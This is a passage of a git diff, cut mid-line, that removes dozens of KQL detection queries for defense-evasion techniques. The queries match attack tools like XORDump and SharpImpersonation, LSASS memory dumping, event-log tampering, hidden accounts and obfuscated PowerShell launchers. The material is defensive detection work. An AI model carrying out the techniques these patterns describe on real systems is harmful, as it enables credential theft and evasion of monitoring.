Evasion/HackTool_-_PowerTool_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/11/29 -// Level: high -// Description: Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and delete the driver files -// Tags: attack.defense_evasion, attack.t1562.001 -DeviceProcessEvents -| where (FolderPath endswith "\\PowerTool.exe" or FolderPath endswith "\\PowerTool64.exe") or ProcessVersionInfoOriginalFileName =~ "PowerTool.exe" \ No newline at end of file diff --git a/Defense Evasion/HackTool_-_RedMimicry_Winnti_Playbook_Execution.kql b/Defense Evasion/HackTool_-_RedMimicry_Winnti_Playbook_Execution.kql deleted file mode 100644 index 90d50234..00000000 --- a/Defense Evasion/HackTool_-_RedMimicry_Winnti_Playbook_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Alexander Rausch -// Date: 2020/06/24 -// Level: high -// Description: Detects actions caused by the RedMimicry Winnti playbook a automated breach emulations utility -// Tags: attack.execution, attack.defense_evasion, attack.t1106, attack.t1059.003, attack.t1218.011 -DeviceProcessEvents -| where (ProcessCommandLine contains "gthread-3.6.dll" or ProcessCommandLine contains "\\Windows\\Temp\\tmp.bat" or ProcessCommandLine contains "sigcmm-2.4.dll") and (FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\cmd.exe") \ No newline at end of file diff --git a/Defense Evasion/HackTool_-_SharpEvtMute_Execution.kql b/Defense Evasion/HackTool_-_SharpEvtMute_Execution.kql deleted file mode 100644 index 76d6ce50..00000000 --- a/Defense Evasion/HackTool_-_SharpEvtMute_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/09/07 -// Level: high -// Description: Detects the use of SharpEvtHook, a tool that tampers with the Windows event logs -// Tags: attack.defense_evasion, attack.t1562.002 -DeviceProcessEvents -| where FolderPath endswith "\\SharpEvtMute.exe" or ProcessVersionInfoFileDescription =~ "SharpEvtMute" or (ProcessCommandLine contains "--Filter \"rule " or ProcessCommandLine contains "--Encoded --Filter \\\"") \ No newline at end of file diff --git a/Defense Evasion/HackTool_-_SharpImpersonation_Execution.kql b/Defense Evasion/HackTool_-_SharpImpersonation_Execution.kql deleted file mode 100644 index 38bdaaa1..00000000 --- a/Defense Evasion/HackTool_-_SharpImpersonation_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Sai Prashanth Pulisetti @pulisettis, Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/12/27 -// Level: high -// Description: Detects execution of the SharpImpersonation tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively -// Tags: attack.privilege_escalation, attack.defense_evasion, attack.t1134.001, attack.t1134.003 -DeviceProcessEvents -| where ((ProcessCommandLine contains " user:" and ProcessCommandLine contains " binary:") or (ProcessCommandLine contains " user:" and ProcessCommandLine contains " shellcode:") or (ProcessCommandLine contains " technique:CreateProcessAsUserW" or ProcessCommandLine contains " technique:ImpersonateLoggedOnuser")) or (FolderPath endswith "\\SharpImpersonation.exe" or ProcessVersionInfoOriginalFileName =~ "SharpImpersonation.exe") \ No newline at end of file diff --git a/Defense Evasion/HackTool_-_Stracciatella_Execution.kql b/Defense Evasion/HackTool_-_Stracciatella_Execution.kql deleted file mode 100644 index fbafb340..00000000 --- a/Defense Evasion/HackTool_-_Stracciatella_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: pH-T (Nextron Systems) -// Date: 2023/04/17 -// Level: high -// Description: Detects Stracciatella which executes a Powershell runspace from within C# (aka SharpPick technique) with AMSI, ETW and Script Block Logging disabled based on PE metadata characteristics. -// Tags: attack.execution, attack.defense_evasion, attack.t1059, attack.t1562.001 -DeviceProcessEvents -| where FolderPath endswith "\\Stracciatella.exe" or ProcessVersionInfoOriginalFileName =~ "Stracciatella.exe" or ProcessVersionInfoFileDescription =~ "Stracciatella" or (SHA256 startswith "9d25e61ec1527e2a69d7c2a4e3fe2fe15890710c198a66a9f25d99fdf6c7b956" or SHA256 startswith "fd16609bd9830c63b9413671678bb159b89c357d21942ddbb6b93add808d121a") or (SHA256 in~ ("9d25e61ec1527e2a69d7c2a4e3fe2fe15890710c198a66a9f25d99fdf6c7b956", "fd16609bd9830c63b9413671678bb159b89c357d21942ddbb6b93add808d121a")) \ No newline at end of file diff --git a/Defense Evasion/HackTool_-_WinPwn_Execution.kql b/Defense Evasion/HackTool_-_WinPwn_Execution.kql deleted file mode 100644 index bd621578..00000000 --- a/Defense Evasion/HackTool_-_WinPwn_Execution.kql +++ /dev/null @@ -1,8 +0,0 @@ -// Author: Swachchhanda Shrawan Poudel -// Date: 2023/12/04 -// Level: high -// Description: Detects commandline keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation. - -// Tags: attack.credential_access, attack.defense_evasion, attack.discovery, attack.execution, attack.privilege_escalation, attack.t1046, attack.t1082, attack.t1106, attack.t1518, attack.t1548.002, attack.t1552.001, attack.t1555, attack.t1555.003 -DeviceProcessEvents -| where ProcessCommandLine contains "Offline_Winpwn" or ProcessCommandLine contains "WinPwn " or ProcessCommandLine contains "WinPwn.exe" or ProcessCommandLine contains "WinPwn.ps1" \ No newline at end of file diff --git a/Defense Evasion/HackTool_-_Wmiexec_Default_Powershell_Command.kql b/Defense Evasion/HackTool_-_Wmiexec_Default_Powershell_Command.kql deleted file mode 100644 index 68ddb59a..00000000 --- a/Defense Evasion/HackTool_-_Wmiexec_Default_Powershell_Command.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/03/08 -// Level: high -// Description: Detects the execution of PowerShell with a specific flag sequence that is used by the Wmiexec script -// Tags: attack.defense_evasion, attack.lateral_movement -DeviceProcessEvents -| where ProcessCommandLine contains "-NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc" \ No newline at end of file diff --git a/Defense Evasion/HackTool_-_XORDump_Execution.kql b/Defense Evasion/HackTool_-_XORDump_Execution.kql deleted file mode 100644 index e4c4bc39..00000000 --- a/Defense Evasion/HackTool_-_XORDump_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/01/28 -// Level: high -// Description: Detects suspicious use of XORDump process memory dumping utility -// Tags: attack.defense_evasion, attack.t1036, attack.t1003.001 -DeviceProcessEvents -| where FolderPath endswith "\\xordump.exe" or (ProcessCommandLine contains " -process lsass.exe " or ProcessCommandLine contains " -m comsvcs " or ProcessCommandLine contains " -m dbghelp " or ProcessCommandLine contains " -m dbgcore ") \ No newline at end of file diff --git a/Defense Evasion/Hide_Schedule_Task_Via_Index_Value_Tamper.kql b/Defense Evasion/Hide_Schedule_Task_Via_Index_Value_Tamper.kql deleted file mode 100644 index 95c4232d..00000000 --- a/Defense Evasion/Hide_Schedule_Task_Via_Index_Value_Tamper.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/26 -// Level: high -// Description: Detects when the "index" value of a scheduled task is modified from the registry -Which effectively hides it from any tooling such as "schtasks /query" (Read the referenced link for more information about the effects of this technique) - -// Tags: attack.defense_evasion, attack.t1562 -DeviceRegistryEvents -| where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree" and RegistryKey contains "Index") \ No newline at end of file diff --git a/Defense Evasion/Hiding_Files_with_Attrib.exe.kql b/Defense Evasion/Hiding_Files_with_Attrib.exe.kql deleted file mode 100644 index e50cf89e..00000000 --- a/Defense Evasion/Hiding_Files_with_Attrib.exe.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Sami Ruohonen -// Date: 2019/01/16 -// Level: medium -// Description: Detects usage of attrib.exe to hide files from users. -// Tags: attack.defense_evasion, attack.t1564.001 -DeviceProcessEvents -| where (ProcessCommandLine contains " +h " and (FolderPath endswith "\\attrib.exe" or ProcessVersionInfoOriginalFileName =~ "ATTRIB.EXE")) and (not(ProcessCommandLine contains "\\desktop.ini ")) and (not((ProcessCommandLine =~ "+R +H +S +A \\*.cui" and InitiatingProcessCommandLine =~ "C:\\WINDOWS\\system32\\*.bat" and InitiatingProcessFolderPath endswith "\\cmd.exe"))) \ No newline at end of file diff --git a/Defense Evasion/Hiding_User_Account_Via_SpecialAccounts_Registry_Key.kql b/Defense Evasion/Hiding_User_Account_Via_SpecialAccounts_Registry_Key.kql deleted file mode 100644 index 35550a8f..00000000 --- a/Defense Evasion/Hiding_User_Account_Via_SpecialAccounts_Registry_Key.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), frack113 -// Date: 2022/07/12 -// Level: high -// Description: Detects modifications to the registry key "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" where the value is set to "0" in order to hide user account from being listed on the logon screen. -// Tags: attack.defense_evasion, attack.t1564.002 -DeviceRegistryEvents -| where RegistryValueData =~ "DWORD (0x00000000)" and ActionType =~ "RegistryValueSet" and RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList" \ No newline at end of file diff --git a/Defense Evasion/Hypervisor_Enforced_Code_Integrity_Disabled.kql b/Defense Evasion/Hypervisor_Enforced_Code_Integrity_Disabled.kql deleted file mode 100644 index c02daff0..00000000 --- a/Defense Evasion/Hypervisor_Enforced_Code_Integrity_Disabled.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Anish Bogati -// Date: 2023/03/14 -// Level: high -// Description: Detects changes to the HypervisorEnforcedCodeIntegrity registry key and the "Enabled" value being set to 0 in order to disable the Hypervisor Enforced Code Integrity feature. This allows an attacker to load unsigned and untrusted code to be run in the kernel -// Tags: attack.defense_evasion, attack.t1562.001 -DeviceRegistryEvents -| where RegistryValueData =~ "DWORD (0x00000000)" and ActionType =~ "RegistryValueSet" and (RegistryKey endswith "\\Microsoft\\Windows\\DeviceGuard\\HypervisorEnforcedCodeIntegrity" or RegistryKey endswith "\\Control\\DeviceGuard\\HypervisorEnforcedCodeIntegrity" or RegistryKey endswith "\\Control\\DeviceGuard\\Scenarios\\HypervisorEnforcedCodeIntegrity\\Enabled") \ No newline at end of file diff --git a/Defense Evasion/IE_ZoneMap_Setting_Downgraded_To_MyComputer_Zone_For_HTTP_Protocols.kql b/Defense Evasion/IE_ZoneMap_Setting_Downgraded_To_MyComputer_Zone_For_HTTP_Protocols.kql deleted file mode 100644 index 8d85ed8d..00000000 --- a/Defense Evasion/IE_ZoneMap_Setting_Downgraded_To_MyComputer_Zone_For_HTTP_Protocols.kql +++ /dev/null @@ -1,8 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Michael Haag (idea) -// Date: 2023/09/05 -// Level: high -// Description: Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally. - -// Tags: attack.defense_evasion -DeviceRegistryEvents -| where RegistryValueData contains "DWORD (0x00000000)" and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProtocolDefaults" and (RegistryKey endswith "\\http" or RegistryKey endswith "\\https") \ No newline at end of file diff --git a/Defense Evasion/IE_ZoneMap_Setting_Downgraded_To_MyComputer_Zone_For_HTTP_Protocols_Via_CLI.kql b/Defense Evasion/IE_ZoneMap_Setting_Downgraded_To_MyComputer_Zone_For_HTTP_Protocols_Via_CLI.kql deleted file mode 100644 index 914b3568..00000000 --- a/Defense Evasion/IE_ZoneMap_Setting_Downgraded_To_MyComputer_Zone_For_HTTP_Protocols_Via_CLI.kql +++ /dev/null @@ -1,8 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/09/05 -// Level: high -// Description: Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally. - -// Tags: attack.execution, attack.defense_evasion -DeviceProcessEvents -| where ProcessCommandLine contains "\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProtocolDefaults" and ProcessCommandLine contains "http" and ProcessCommandLine contains " 0" \ No newline at end of file diff --git a/Defense Evasion/IIS_WebServer_Access_Logs_Deleted.kql b/Defense Evasion/IIS_WebServer_Access_Logs_Deleted.kql deleted file mode 100644 index eb074d5f..00000000 --- a/Defense Evasion/IIS_WebServer_Access_Logs_Deleted.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/09/16 -// Level: medium -// Description: Detects the deletion of IIS WebServer access logs which may indicate an attempt to destroy forensic evidence -// Tags: attack.defense_evasion, attack.t1070 -DeviceFileEvents -| where FolderPath contains "\\inetpub\\logs\\LogFiles\\" and FolderPath endswith ".log" \ No newline at end of file diff --git a/Defense Evasion/Import_LDAP_Data_Interchange_Format_File_Via_Ldifde.EXE.kql b/Defense Evasion/Import_LDAP_Data_Interchange_Format_File_Via_Ldifde.EXE.kql deleted file mode 100644 index bb522faa..00000000 --- a/Defense Evasion/Import_LDAP_Data_Interchange_Format_File_Via_Ldifde.EXE.kql +++ /dev/null @@ -1,8 +0,0 @@ -// Author: @gott_cyber -// Date: 2022/09/02 -// Level: medium -// Description: Detects the execution of "Ldifde.exe" with the import flag "-i". The can be abused to include HTTP-based arguments which will allow the arbitrary download of files from a remote server. - -// Tags: attack.command_and_control, attack.defense_evasion, attack.t1218, attack.t1105 -DeviceProcessEvents -| where (ProcessCommandLine contains "-i" and ProcessCommandLine contains "-f") and (FolderPath endswith "\\ldifde.exe" or ProcessVersionInfoOriginalFileName =~ "ldifde.exe") \ No newline at end of file diff --git a/Defense Evasion/Imports_Registry_Key_From_a_File.kql b/Defense Evasion/Imports_Registry_Key_From_a_File.kql deleted file mode 100644 index bc1d23a1..00000000 --- a/Defense Evasion/Imports_Registry_Key_From_a_File.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Oddvar Moe, Sander Wiebing, oscd.community -// Date: 2020/10/07 -// Level: medium -// Description: Detects the import of the specified file to the registry with regedit.exe. -// Tags: attack.t1112, attack.defense_evasion -DeviceProcessEvents -| where ((ProcessCommandLine contains " /i " or ProcessCommandLine contains " /s " or ProcessCommandLine contains ".reg") and (FolderPath endswith "\\regedit.exe" or ProcessVersionInfoOriginalFileName =~ "REGEDIT.EXE")) and (not(((ProcessCommandLine contains " -e " or ProcessCommandLine contains " /e " or ProcessCommandLine contains " -a " or ProcessCommandLine contains " /a " or ProcessCommandLine contains " -c " or ProcessCommandLine contains " /c ") and ProcessCommandLine matches regex ":[^ \\\\]"))) \ No newline at end of file diff --git a/Defense Evasion/Imports_Registry_Key_From_an_ADS.kql b/Defense Evasion/Imports_Registry_Key_From_an_ADS.kql deleted file mode 100644 index 7ba7ccb4..00000000 --- a/Defense Evasion/Imports_Registry_Key_From_an_ADS.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Oddvar Moe, Sander Wiebing, oscd.community -// Date: 2020/10/12 -// Level: high -// Description: Detects the import of a alternate datastream to the registry with regedit.exe. -// Tags: attack.t1112, attack.defense_evasion -DeviceProcessEvents -| where (((ProcessCommandLine contains " /i " or ProcessCommandLine contains ".reg") and ProcessCommandLine matches regex ":[^ \\\\]") and (FolderPath endswith "\\regedit.exe" or ProcessVersionInfoOriginalFileName =~ "REGEDIT.EXE")) and (not((ProcessCommandLine contains " -e " or ProcessCommandLine contains " /e " or ProcessCommandLine contains " -a " or ProcessCommandLine contains " /a " or ProcessCommandLine contains " -c " or ProcessCommandLine contains " /c "))) \ No newline at end of file diff --git a/Defense Evasion/Indirect_Command_Execution_By_Program_Compatibility_Wizard.kql b/Defense Evasion/Indirect_Command_Execution_By_Program_Compatibility_Wizard.kql deleted file mode 100644 index 786d5065..00000000 --- a/Defense Evasion/Indirect_Command_Execution_By_Program_Compatibility_Wizard.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: A. Sungurov , oscd.community -// Date: 2020/10/12 -// Level: low -// Description: Detect indirect command execution via Program Compatibility Assistant pcwrun.exe -// Tags: attack.defense_evasion, attack.t1218, attack.execution -DeviceProcessEvents -| where InitiatingProcessFolderPath endswith "\\pcwrun.exe" \ No newline at end of file diff --git a/Defense Evasion/Indirect_Command_Execution_From_Script_File_Via_Bash.EXE.kql b/Defense Evasion/Indirect_Command_Execution_From_Script_File_Via_Bash.EXE.kql deleted file mode 100644 index cce1ac92..00000000 --- a/Defense Evasion/Indirect_Command_Execution_From_Script_File_Via_Bash.EXE.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/08/15 -// Level: medium -// Description: Detects execution of Microsoft bash launcher without any flags to execute the content of a bash script directly. -This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash. - -// Tags: attack.defense_evasion, attack.t1202 -DeviceProcessEvents -| where ((FolderPath endswith ":\\Windows\\System32\\bash.exe" or FolderPath endswith ":\\Windows\\SysWOW64\\bash.exe") or ProcessVersionInfoOriginalFileName =~ "Bash.exe") and (not(((ProcessCommandLine contains "bash.exe -" or ProcessCommandLine contains "bash -") or ProcessCommandLine =~ "" or isnull(ProcessCommandLine) or (ProcessCommandLine in~ ("bash.exe", "bash"))))) \ No newline at end of file diff --git a/Defense Evasion/Indirect_Inline_Command_Execution_Via_Bash.EXE.kql b/Defense Evasion/Indirect_Inline_Command_Execution_Via_Bash.EXE.kql deleted file mode 100644 index 833625c5..00000000 --- a/Defense Evasion/Indirect_Inline_Command_Execution_Via_Bash.EXE.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: frack113 -// Date: 2021/11/24 -// Level: medium -// Description: Detects execution of Microsoft bash launcher with the "-c" flag. -This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash. - -// Tags: attack.defense_evasion, attack.t1202 -DeviceProcessEvents -| where ProcessCommandLine contains " -c " and ((FolderPath endswith ":\\Windows\\System32\\bash.exe" or FolderPath endswith ":\\Windows\\SysWOW64\\bash.exe") or ProcessVersionInfoOriginalFileName =~ "Bash.exe") \ No newline at end of file diff --git a/Defense Evasion/InfDefaultInstall.exe_.inf_Execution.kql b/Defense Evasion/InfDefaultInstall.exe_.inf_Execution.kql deleted file mode 100644 index 3f8cac71..00000000 --- a/Defense Evasion/InfDefaultInstall.exe_.inf_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2021/07/13 -// Level: medium -// Description: Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file. -// Tags: attack.defense_evasion, attack.t1218 -DeviceProcessEvents -| where ProcessCommandLine contains "InfDefaultInstall.exe " and ProcessCommandLine contains ".inf" \ No newline at end of file diff --git a/Defense Evasion/Insensitive_Subfolder_Search_Via_Findstr.EXE.kql b/Defense Evasion/Insensitive_Subfolder_Search_Via_Findstr.EXE.kql deleted file mode 100644 index 11e34eff..00000000 --- a/Defense Evasion/Insensitive_Subfolder_Search_Via_Findstr.EXE.kql +++ /dev/null @@ -1,8 +0,0 @@ -// Author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali (Nextron Systems) -// Date: 2020/10/05 -// Level: low -// Description: Detects execution of findstr with the "s" and "i" flags for a "subfolder" and "insensitive" search respectively. Attackers sometimes leverage this built-in utility to search the system for interesting files or filter through results of commands. - -// Tags: attack.defense_evasion, attack.t1218, attack.t1564.004, attack.t1552.001, attack.t1105 -DeviceProcessEvents -| where (ProcessCommandLine contains "findstr" or FolderPath endswith "findstr.exe" or ProcessVersionInfoOriginalFileName =~ "FINDSTR.EXE") and ((ProcessCommandLine contains " -i " or ProcessCommandLine contains " /i ") and (ProcessCommandLine contains " -s " or ProcessCommandLine contains " /s ")) \ No newline at end of file diff --git a/Defense Evasion/Install_New_Package_Via_Winget_Local_Manifest.kql b/Defense Evasion/Install_New_Package_Via_Winget_Local_Manifest.kql deleted file mode 100644 index 5c46388e..00000000 --- a/Defense Evasion/Install_New_Package_Via_Winget_Local_Manifest.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: Sreeman, Florian Roth (Nextron Systems), frack113 -// Date: 2020/04/21 -// Level: medium -// Description: Detects usage of winget to install applications via manifest file. Adversaries can abuse winget to download payloads remotely and execute them. -The manifest option enables you to install an application by passing in a YAML file directly to the client. -Winget can be used to download and install exe, msi or msix files later. - -// Tags: attack.defense_evasion, attack.execution, attack.t1059 -DeviceProcessEvents -| where (FolderPath endswith "\\winget.exe" or ProcessVersionInfoOriginalFileName =~ "winget.exe") and (ProcessCommandLine contains "install" or ProcessCommandLine contains " add ") and (ProcessCommandLine contains "-m " or ProcessCommandLine contains "--manifest") \ No newline at end of file diff --git a/Defense Evasion/Internet_Explorer_DisableFirstRunCustomize_Enabled.kql b/Defense Evasion/Internet_Explorer_DisableFirstRunCustomize_Enabled.kql deleted file mode 100644 index f419e936..00000000 --- a/Defense Evasion/Internet_Explorer_DisableFirstRunCustomize_Enabled.kql +++ /dev/null @@ -1,8 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/05/16 -// Level: medium -// Description: Detects changes to the Internet Explorer "DisableFirstRunCustomize" value, which prevents Internet Explorer from running the first run wizard the first time a user starts the browser after installing Internet Explorer or Windows. - -// Tags: attack.defense_evasion -DeviceRegistryEvents -| where ((RegistryValueData in~ ("DWORD (0x00000001)", "DWORD (0x00000002)")) and RegistryKey endswith "\\Microsoft\\Internet Explorer\\Main\\DisableFirstRunCustomize") and (not((InitiatingProcessFolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\ie4uinit.exe")))) \ No newline at end of file diff --git a/Defense Evasion/Invoke-Obfuscation_CLIP+_Launcher.kql b/Defense Evasion/Invoke-Obfuscation_CLIP+_Launcher.kql deleted file mode 100644 index 4af2d38a..00000000 --- a/Defense Evasion/Invoke-Obfuscation_CLIP+_Launcher.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Jonathan Cheong, oscd.community -// Date: 2020/10/13 -// Level: high -// Description: Detects Obfuscated use of Clip.exe to execute PowerShell -// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001 -DeviceProcessEvents -| where (ProcessCommandLine contains "/c" or ProcessCommandLine contains "/r") and (ProcessCommandLine contains "cmd" and ProcessCommandLine contains "&&" and ProcessCommandLine contains "clipboard]::" and ProcessCommandLine contains "-f") \ No newline at end of file diff --git a/Defense Evasion/Invoke-Obfuscation_COMPRESS_OBFUSCATION.kql b/Defense Evasion/Invoke-Obfuscation_COMPRESS_OBFUSCATION.kql deleted file mode 100644 index b42471c1..00000000 --- a/Defense Evasion/Invoke-Obfuscation_COMPRESS_OBFUSCATION.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Timur Zinniatullin, oscd.community -// Date: 2020/10/18 -// Level: medium -// Description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION -// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001 -DeviceProcessEvents -| where (ProcessCommandLine contains "system.io.compression.deflatestream" or ProcessCommandLine contains "system.io.streamreader" or ProcessCommandLine contains "readtoend(") and (ProcessCommandLine contains "new-object" and ProcessCommandLine contains "text.encoding]::ascii") \ No newline at end of file diff --git a/Defense Evasion/Invoke-Obfuscation_Obfuscated_IEX_Invocation.kql b/Defense Evasion/Invoke-Obfuscation_Obfuscated_IEX_Invocation.kql deleted file mode 100644 index c693d26a..00000000 --- a/Defense Evasion/Invoke-Obfuscation_Obfuscated_IEX_Invocation.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Daniel Bohannon (@Mandiant/@FireEye), oscd.community -// Date: 2019/11/08 -// Level: high -// Description: Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block -// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001 -DeviceProcessEvents -| where ProcessCommandLine matches regex "\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[" or ProcessCommandLine matches regex "\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[" or ProcessCommandLine matches regex "\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[" or ProcessCommandLine matches regex "\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}" or ProcessCommandLine matches regex "\\*mdr\\*\\W\\s*\\)\\.Name" or ProcessCommandLine matches regex "\\$VerbosePreference\\.ToString\\(" or ProcessCommandLine matches regex "\\[String\\]\\s*\\$VerbosePreference" \ No newline at end of file diff --git a/Defense Evasion/Invoke-Obfuscation_STDIN+_Launcher.kql b/Defense Evasion/Invoke-Obfuscation_STDIN+_Launcher.kql deleted file mode 100644 index 4108ea3f..00000000 --- a/Defense Evasion/Invoke-Obfuscation_STDIN+_Launcher.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Jonathan Cheong, oscd.community -// Date: 2020/10/15 -// Level: high -// Description: Detects Obfuscated use of stdin to execute PowerShell -// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001 -DeviceProcessEvents -| where ProcessCommandLine matches regex "cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$\\{?input\\}?|noexit).+\\"" \ No newline at end of file diff --git a/Defense Evasion/Invoke-Obfuscation_VAR++_LAUNCHER_OBFUSCATION.kql b/Defense Evasion/Invoke-Obfuscation_VAR++_LAUNCHER_OBFUSCATION.kql deleted file mode 100644 index e1957d0c..00000000 --- a/Defense Evasion/Invoke-Obfuscation_VAR++_LAUNCHER_OBFUSCATION.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Timur Zinniatullin, oscd.community -// Date: 2020/10/13 -// Level: high -// Description: Detects Obfuscated Powershell via VAR++ LAUNCHER -// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001 -DeviceProcessEvents -| where (ProcessCommandLine contains "{0}" or ProcessCommandLine contains "{1}" or ProcessCommandLine contains "{2}" or ProcessCommandLine contains "{3}" or ProcessCommandLine contains "{4}" or ProcessCommandLine contains "{5}") and (ProcessCommandLine contains "&&set" and ProcessCommandLine contains "cmd" and ProcessCommandLine contains "/c" and ProcessCommandLine contains "-f") \ No newline at end of file diff --git a/Defense Evasion/Invoke-Obfuscation_VAR+_Launcher.kql b/Defense Evasion/Invoke-Obfuscation_VAR+_Launcher.kql deleted file mode 100644 index c5c03061..00000000 --- a/Defense Evasion/Invoke-Obfuscation_VAR+_Launcher.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Jonathan Cheong, oscd.community -// Date: 2020/10/15 -// Level: high -// Description: Detects Obfuscated use of Environment Variables to execute PowerShell -// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001 -DeviceProcessEvents -| where ProcessCommandLine matches regex "cmd.{0,5}(?:/c|/r)(?:\\s|)\\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\\"\\s+?\\-f(?:.*\\)){1,}.*\\"" \ No newline at end of file diff --git a/Defense Evasion/Invoke-Obfuscation_Via_Stdin.kql b/Defense Evasion/Invoke-Obfuscation_Via_Stdin.kql deleted file mode 100644 index c7d99e0d..00000000 --- a/Defense Evasion/Invoke-Obfuscation_Via_Stdin.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nikita Nazarov, oscd.community -// Date: 2020/10/12 -// Level: high -// Description: Detects Obfuscated Powershell via Stdin in Scripts -// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001 -DeviceProcessEvents -| where ProcessCommandLine matches regex "(?i)(set).*&&\\s?set.*(environment|invoke|\\$\\{?input).*&&.*"" \ No newline at end of file diff --git a/Defense Evasion/Invoke-Obfuscation_Via_Use_Clip.kql b/Defense Evasion/Invoke-Obfuscation_Via_Use_Clip.kql deleted file mode 100644 index b66ecade..00000000 --- a/Defense Evasion/Invoke-Obfuscation_Via_Use_Clip.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nikita Nazarov, oscd.community -// Date: 2020/10/09 -// Level: high -// Description: Detects Obfuscated Powershell via use Clip.exe in Scripts -// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001 -DeviceProcessEvents -| where ProcessCommandLine matches regex "(?i)echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?)" \ No newline at end of file diff --git a/Defense Evasion/Invoke-Obfuscation_Via_Use_MSHTA.kql b/Defense Evasion/Invoke-Obfuscation_Via_Use_MSHTA.kql deleted file mode 100644 index 7041f5ee..00000000 --- a/Defense Evasion/Invoke-Obfuscation_Via_Use_MSHTA.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nikita Nazarov, oscd.community -// Date: 2020/10/08 -// Level: high -// Description: Detects Obfuscated Powershell via use MSHTA in Scripts -// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001 -DeviceProcessEvents -| where ProcessCommandLine contains "set" and ProcessCommandLine contains "&&" and ProcessCommandLine contains "mshta" and ProcessCommandLine contains "vbscript:createobject" and ProcessCommandLine contains ".run" and ProcessCommandLine contains "(window.close)" \ No newline at end of file diff --git a/Defense Evasion/JScript_Compiler_Execution.kql b/Defense Evasion/JScript_Compiler_Execution.kql deleted file mode 